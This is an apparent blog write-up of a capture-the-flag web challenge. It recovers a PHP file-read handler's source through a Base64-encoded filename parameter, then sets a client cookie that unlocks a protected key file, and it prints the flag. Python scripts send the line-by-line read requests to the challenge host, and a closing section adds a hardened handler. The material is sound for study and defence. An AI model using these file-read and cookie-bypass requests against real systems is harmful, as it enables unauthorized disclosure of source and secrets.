Begin


The filename parameter turns out to be the Base64 encoding of keys.txt, so try reading index.php the same way.


That returns content, so the next step is to read the whole file line by line.

import requests

# Read index.php one line per request; aW5kZXgucGhw is Base64 for "index.php"
for i in range(0, 20):
    url = "http://123.206.87.240:8002/web11/index.php?line=%d&filename=aW5kZXgucGhw" % i
    response = requests.get(url=url)
    print(response.text)

<?php

error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}

if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>

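The logic is not hard to follow: we need to set the cookie margin=margin, which adds keys.php to the list of readable files, and then read keys.php with the same method.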

import requests
from base64 import b64encode

# Same line-by-line read, now for keys.php, sending the cookie that index.php checks
filename = b64encode(b"keys.php").decode()
for i in range(0, 20):
    url = "http://123.206.87.240:8002/web11/index.php?line=%d&filename=%s" % (i, filename)
    header = {
        "Cookie": "margin=margin"
    }
    res = requests.get(url=url, headers=header)
    print(res.text)

<?php $key='KEY{key_keys}'; ?>

This gives the flag: KEY{key_keys}
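
The challenge depends on two weaknesses in index.php: the whitelist includes index.php itself, and the keys.php entry is unlocked by a cookie the client controls. The sketch below models that check in Python next to a hardened handler. It is an added example, not part of the original post; the function names, the `role` argument (standing in for server-side session state) and the sample files are assumptions.

```python
import base64
import os
import tempfile

def challenge_allowlist(cookies):
    """Model of the challenge logic: a cookie value alone unlocks keys.php."""
    allowed = ["keys.txt", "index.php"]      # index.php serves its own source
    if cookies.get("margin") == "margin":    # client-controlled, not authentication
        allowed.append("keys.php")
    return allowed

# Hardened allowlist (assumption): file name -> role required, None means public.
# index.php is absent, so the handler can no longer disclose its own source.
HARDENED = {"keys.txt": None, "keys.php": "admin"}

def hardened_read(base_dir, filename_b64, line, role=None):
    """Return one line of an allowed file, or None. `role` stands in for a
    value taken from server-side session state, never from a request cookie."""
    try:
        name = base64.b64decode(filename_b64, validate=True).decode("utf-8")
    except ValueError:                       # malformed Base64 or non-UTF-8 bytes
        return None
    if name not in HARDENED:
        return None
    required = HARDENED[name]
    if required is not None and role != required:
        return None
    with open(os.path.join(base_dir, name), encoding="utf-8") as fh:
        lines = fh.read().splitlines()
    return lines[line] if 0 <= line < len(lines) else None

def demo():
    """Run the hardened handler against constructed sample files."""
    enc = lambda s: base64.b64encode(s.encode()).decode()
    with tempfile.TemporaryDirectory() as d:
        for name, body in {"keys.txt": "public line\n", "index.php": "<?php ?>\n",
                           "keys.php": "<?php $key='PLACEHOLDER'; ?>\n"}.items():
            with open(os.path.join(d, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return {
            "public": hardened_read(d, enc("keys.txt"), 0),
            "source": hardened_read(d, enc("index.php"), 0),
            "no_role": hardened_read(d, enc("keys.php"), 0),
            "admin": hardened_read(d, enc("keys.php"), 0, role="admin"),
            "out_of_range": hardened_read(d, enc("keys.txt"), 99),
        }

if __name__ == "__main__":
    print(challenge_allowlist({"margin": "margin"}))
    print(demo())
```
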




Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 3.0. Please credit the source when reposting!